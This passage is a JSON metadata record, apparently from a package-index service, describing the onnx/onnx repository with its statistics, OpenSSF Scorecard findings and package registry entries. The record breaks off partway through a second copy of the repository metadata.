{"id":361979,"url":"https://github.com/onnx/onnx","last_synced_at":"2026-06-21T15:01:32.270Z","repository":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2026-05-30T18:12:10.000Z","size":70700,"stargazers_count":20912,"open_issues_count":265,"forks_count":3935,"subscribers_count":423,"default_branch":"main","last_synced_at":"2026-05-30T20:09:35.573Z","etag":null,"topics":["ai","artificial-intelligence","deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":"NOTICE","maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2026-05-30T18:12:22.000Z","dependencies_parsed_at":"2025-04-15T13:18:07.946Z","dependency_job_id":"18eecf52-5a7d-4c8a-88f2-d8c63852c71f","html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2783,"total_committers":358,"mean_commits":7.773743016759776,"dds":0.903701042040963,"last_synced_commit":"f615b26d564ca5d2e2a28af81f4b86a99a1865f1"},"previous_names":[],"tags_count":38,"template":false,"template_full_name":null,"purl":"pkg:github/onnx/onnx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/sbom","scorecard":{"id":245425,"data":{"date":"2025-08-16T10:32:36Z","repo":{"name":"github.com/onnx/onnx","commit":"3e8c39a7c90f06e3a5ea9561c72770649dcb1b4f"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":6.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: Dependabot: .github/dependabot.yml:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":0,"reason":"dangerous workflow patterns detected","details":["Warn: untrusted code checkout '${{ github.event.pull_request.head.sha }}': .github/workflows/auto_update_doc.yml:25"],"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/auto_update_doc.yml:22","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:35","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:36","Info: jobLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:26","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:214","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:266","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:304","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:162","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/auto_update_doc.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/check_urls.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/clang_tidy_review.yml:16","Warn: topLevel 'checks' permission set to 'write': .github/workflows/clang_tidy_review_post.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:62","Info: topLevel 'contents' permission set to 'read': .github/workflows/dco_merge_group.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/pages.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/pixi_build.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/preview_source_dist_test.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_linux.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_mac.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_sdist.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_aarch64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_x86_64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/reuse.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/stale.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/weekly_modelzoo.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/win_no_exception_ci.yml:14"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Info: Possibly incomplete results: error parsing shell code: statements must be separated by \u0026, ; or a newline: .github/workflows/main.yml:131","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/copilot-setup-steps.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/copilot-setup-steps.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr_checks.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pr_checks.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:78","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:39","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:40","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:73","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:80","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:85","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:86","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:151","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:161","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:171","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:189","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:195","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:249","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:266","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:37","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:38","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/pr_checks.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:49","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:50","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:57","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:82","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:112","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:113","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:119","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:120","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:126","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:46","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:55","Info:  59 out of  61 GitHub-owned GitHubAction dependencies pinned","Info:  22 out of  27 third-party GitHubAction dependencies pinned","Info:   0 out of  49 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/create_release.yml:152"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"74 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-6rq9-53c3-f7vj","Warn: Project is vulnerable to: PYSEC-2023-38 / GHSA-ffxj-547x-5j7c","Warn: Project is vulnerable to: PYSEC-2025-10 / GHSA-h36j-8vv3-cj52","Warn: Project is vulnerable to: PYSEC-2024-223 / GHSA-h8wv-9h96-m4hr","Warn: Project is vulnerable to: PYSEC-2024-222 / GHSA-whh8-fjgc-qp73","Warn: Project is vulnerable to: GHSA-3c5c-7235-994j","Warn: Project is vulnerable to: GHSA-3f63-hfp8-52jq","Warn: Project is vulnerable to: PYSEC-2021-41 / GHSA-3wvg-mj6g-m9cv","Warn: Project is vulnerable to: PYSEC-2020-77 / GHSA-3xv8-3j54-hgrp","Warn: Project is vulnerable to: PYSEC-2020-80 / GHSA-43fq-w8qq-v88h","Warn: Project is vulnerable to: GHSA-44wm-f244-xhp3","Warn: Project is vulnerable to: GHSA-4fx9-vc88-q2xc","Warn: Project is vulnerable to: PYSEC-2021-35 / GHSA-57h3-9rgr-c24m","Warn: Project is vulnerable to: PYSEC-2020-172 / GHSA-5gm3-px64-rw72","Warn: Project is vulnerable to: PYSEC-2021-331 / GHSA-7534-mm45-c74v","Warn: Project is vulnerable to: PYSEC-2021-92 / GHSA-7r7m-5h27-29hp","Warn: Project is vulnerable to: PYSEC-2020-78 / GHSA-8843-m7mw-mxqm","Warn: Project is vulnerable to: PYSEC-2023-227 / GHSA-8ghj-p4vj-mr35","Warn: Project is vulnerable to: PYSEC-2014-87 / GHSA-8m9x-pxwq-j236","Warn: Project is vulnerable to: PYSEC-2022-10 / GHSA-8vj2-vxx3-667w","Warn: Project is vulnerable to: PYSEC-2021-36 / GHSA-8xjq-8fcg-g5hw","Warn: Project is vulnerable to: PYSEC-2016-6 / GHSA-8xjv-v9xq-m5h9","Warn: Project is vulnerable to: PYSEC-2021-42 / GHSA-95q3-8gr9-gm8w","Warn: Project is vulnerable to: PYSEC-2022-168 / GHSA-9j59-75qj-795w","Warn: Project is vulnerable to: PYSEC-2014-10 / GHSA-cfmr-38g9-f2h7","Warn: Project is vulnerable to: PYSEC-2020-76 / GHSA-cqhg-xjhh-p8hf","Warn: Project is vulnerable to: PYSEC-2021-40 / GHSA-f4w8-cv6p-x6r5","Warn: Project is vulnerable to: PYSEC-2021-69 / GHSA-f5g8-5qq7-938w","Warn: Project is vulnerable to: PYSEC-2021-139 / GHSA-g6rj-rv7j-xwp4","Warn: Project is vulnerable to: PYSEC-2015-16 / GHSA-h5rf-vgqx-wjv2","Warn: Project is vulnerable to: PYSEC-2016-5 / GHSA-hggx-3h72-49ww","Warn: Project is vulnerable to: PYSEC-2020-84 / GHSA-hj69-c76v-86wr","Warn: Project is vulnerable to: PYSEC-2016-7 / GHSA-hvr8-466p-75rh","Warn: Project is vulnerable to: PYSEC-2015-15 / GHSA-j6f7-g425-4gmx","Warn: Project is vulnerable to: GHSA-j7hp-h8jx-5ppr","Warn: Project is vulnerable to: PYSEC-2019-110 / GHSA-j7mj-748x-7p78","Warn: Project is vulnerable to: GHSA-jgpv-4h4c-xhw3","Warn: Project is vulnerable to: PYSEC-2022-42979 / GHSA-m2vv-5vj5-2hm7","Warn: Project is vulnerable to: PYSEC-2021-37 / GHSA-mvg9-xffr-p774","Warn: Project is vulnerable to: PYSEC-2020-83 / GHSA-p49h-hjvm-jg3h","Warn: Project is vulnerable to: PYSEC-2022-8 / GHSA-pw3c-h7wp-cvhx","Warn: Project is vulnerable to: PYSEC-2021-93 / GHSA-q5hq-fp76-qmrc","Warn: Project is vulnerable to: PYSEC-2020-82 / GHSA-r7rm-8j6h-r933","Warn: Project is vulnerable to: PYSEC-2014-23 / GHSA-r854-96gq-rfg3","Warn: Project is vulnerable to: PYSEC-2016-8 / GHSA-rwr3-c2q8-gm56","Warn: Project is vulnerable to: PYSEC-2020-81 / GHSA-vcqg-3p29-xw73","Warn: Project is vulnerable to: PYSEC-2020-79 / GHSA-vj42-xq3r-hr3r","Warn: Project is vulnerable to: PYSEC-2021-70 / GHSA-vqcj-wrf2-7v73","Warn: Project is vulnerable to: PYSEC-2016-9 / GHSA-w4vg-rf63-f3j3","Warn: Project is vulnerable to: PYSEC-2014-22 / GHSA-x895-2wrm-hvp7","Warn: Project is vulnerable to: PYSEC-2022-9 / GHSA-xrcv-f9gm-v42c","Warn: Project is vulnerable to: PYSEC-2021-137","Warn: Project is vulnerable to: PYSEC-2021-138","Warn: Project is vulnerable to: PYSEC-2021-317","Warn: Project is vulnerable to: PYSEC-2021-38","Warn: Project is vulnerable to: PYSEC-2021-39","Warn: Project is vulnerable to: PYSEC-2021-94","Warn: Project is vulnerable to: PYSEC-2023-175","Warn: Project is vulnerable to: PYSEC-2018-34 / GHSA-2fc2-6r4j-p65h","Warn: Project is vulnerable to: PYSEC-2021-856 / GHSA-5545-2q6w-2gh6","Warn: Project is vulnerable to: PYSEC-2019-108 / GHSA-9fq2-x9r6-wfmf","Warn: Project is vulnerable to: PYSEC-2018-33 / GHSA-cw6w-4rcx-xphc","Warn: Project is vulnerable to: PYSEC-2021-857 / GHSA-f7c7-j99h-c22f","Warn: Project is vulnerable to: GHSA-fpfv-jqm9-f5jm","Warn: Project is vulnerable to: PYSEC-2017-1 / GHSA-frgw-fgh6-9g52","Warn: Project is vulnerable to: PYSEC-2022-48 / GHSA-77rm-9x9h-xj3g","Warn: Project is vulnerable to: GHSA-8gq9-2x98-w8hf","Warn: Project is vulnerable to: GHSA-8qvm-5x2c-j2w7","Warn: Project is vulnerable to: PYSEC-2017-65 / GHSA-jwvw-v7c5-m82h","Warn: Project is vulnerable to: PYSEC-2013-22 / GHSA-27x4-j476-jp5f","Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-cx63-2mw6-8hw5","Warn: Project is vulnerable to: PYSEC-2022-43012 / GHSA-r9hx-vwmv-q579","Warn: Project is vulnerable to: PYSEC-2022-43017 / GHSA-qwmp-2cf2-g9g6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 30 contributing companies or organizations","details":["Info: found contributions from: EasyRPG, PeachPy, ScottyLabs, ZhaobangChina, amd, anthropics, barnowl, chainer, couler-proj, cpprefjp, cryfs, cupy, dotnet, facebook, ghc, gsoc-cn, intelligent-machine-learning, k9mail, microsoft, microsoft research, mrbgems, nanyang technological university, nvidia, onnx, open-keychain, pytorch, sipb, skywork ai, sql-machine-learning, uc berkeley"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-17T07:32:27.176Z","repository_id":24890799,"created_at":"2025-08-17T07:32:27.176Z","updated_at":"2025-08-17T07:32:27.176Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33932048,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-05T02:00:06.157Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"packages":[{"id":12706810,"name":"onnx","ecosystem":"bazel","description":null,"homepage":"https://github.com/onnx/onnx","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":null,"versions_count":4,"first_release_published_at":"2026-01-23T13:40:14.278Z","latest_release_published_at":"2026-04-06T18:15:26.591Z","latest_release_number":"1.20.1","last_synced_at":"2026-06-15T04:34:44.572Z","created_at":"2026-01-23T13:40:13.523Z","updated_at":"2026-06-15T04:34:44.572Z","registry_url":"https://registry.bazel.build/modules/onnx","install_command":"bazel_dep(name = \"onnx\")","documentation_url":"https://registry.bazel.build/docs/onnx","metadata":{"maintainers":[{"email":"daisuke.nishimatsu1021@gmail.com","github":"wep21","name":"Daisuke Nishimatsu","github_user_id":42202095}],"yanked_versions":{},"deprecated":null,"repository":["github:onnx/onnx"]},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:bazel/onnx","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/bazel/onnx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/bazel/onnx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/bazel/onnx/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/registry.bazel.build/packages/onnx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/registry.bazel.build/packages/onnx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/registry.bazel.build/packages/onnx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/registry.bazel.build/packages/onnx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/registry.bazel.build/packages/onnx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/registry.bazel.build/packages/onnx/codemeta","maintainers":[{"uuid":"42202095","login":"wep21","name":"Daisuke Nishimatsu","email":"daisuke.nishimatsu1021@gmail.com","url":null,"packages_count":160,"html_url":null,"role":null,"created_at":"2026-03-01T09:13:15.828Z","updated_at":"2026-03-01T09:13:15.828Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/registry.bazel.build/maintainers/wep21/packages"}],"registry":{"name":"registry.bazel.build","url":"https://registry.bazel.build","ecosystem":"bazel","default":true,"packages_count":1166,"maintainers_count":435,"namespaces_count":0,"keywords_count":174,"github":"bazelbuild","metadata":{"funded_packages_count":15},"icon_url":"https://github.com/bazelbuild.png","created_at":"2026-01-23T13:05:25.896Z","updated_at":"2026-06-10T05:13:28.605Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/registry.bazel.build/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/registry.bazel.build/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/registry.bazel.build/namespaces"}},{"id":5289521,"name":"onnx","ecosystem":"conda","description":"Open Neural Network Exchange (ONNX) is the first step toward an open ecosystem that empowers AI developers to choose the right tools as their project evolves. ONNX provides an open source format for AI models. It defines an extensible computation graph model, as well as definitions of built-in operators and standard data types. Initially we focus on the capabilities needed for inferencing (evaluation).","homepage":"https://github.com/onnx/onnx/","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":null,"versions_count":18,"first_release_published_at":"2022-10-03T15:47:42.277Z","latest_release_published_at":"2022-08-18T15:07:52.000Z","latest_release_number":"1.12.0","last_synced_at":"2026-04-01T16:17:47.426Z","created_at":"2022-10-03T15:47:42.270Z","updated_at":"2026-04-01T16:18:32.921Z","registry_url":"https://anaconda.org/conda-forge/onnx","install_command":"conda install -c conda-forge onnx","documentation_url":null,"metadata":{},"repo_metadata":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2025-10-27T15:22:48.000Z","size":44729,"stargazers_count":19779,"open_issues_count":283,"forks_count":3816,"subscribers_count":426,"default_branch":"main","last_synced_at":"2025-10-27T17:28:08.029Z","etag":null,"topics":["deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2025-10-27T15:22:58.000Z","dependencies_parsed_at":"2025-04-15T13:18:07.946Z","dependency_job_id":"18eecf52-5a7d-4c8a-88f2-d8c63852c71f","html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2783,"total_committers":358,"mean_commits":7.773743016759776,"dds":0.903701042040963,"last_synced_commit":"f615b26d564ca5d2e2a28af81f4b86a99a1865f1"},"previous_names":[],"tags_count":35,"template":false,"template_full_name":null,"purl":"pkg:github/onnx/onnx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r